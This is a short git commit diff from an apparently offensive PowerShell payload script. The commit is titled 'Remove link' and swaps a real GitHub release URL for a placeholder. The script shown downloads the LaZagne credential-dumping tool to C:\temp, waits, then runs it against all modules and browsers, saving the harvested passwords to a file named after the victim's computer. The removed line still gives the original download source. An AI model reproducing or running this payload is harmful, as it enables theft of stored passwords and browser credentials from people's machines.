Remove link.

pull/410/head
Mr. Proxy 2024-07-10 01:40:38 +02:00 committed by GitHub
parent d67cbf2004
commit 69b17636d2
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 1 additions and 1 deletions

View File

@ -2,7 +2,7 @@
# Download LaZagne and execute it
$Test = "C:\temp"
Start-BitsTransfer -Source "https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe" -Destination "$Test/l.exe"
Start-BitsTransfer -Source "https://example.com" -Destination "$Test/l.exe"
Set-Location $Test
Start-Sleep -Milliseconds 15000
.\l.exe all -vv > "$env:computername.txt"; .\l.exe browsers -vv >> "$env:computername.txt"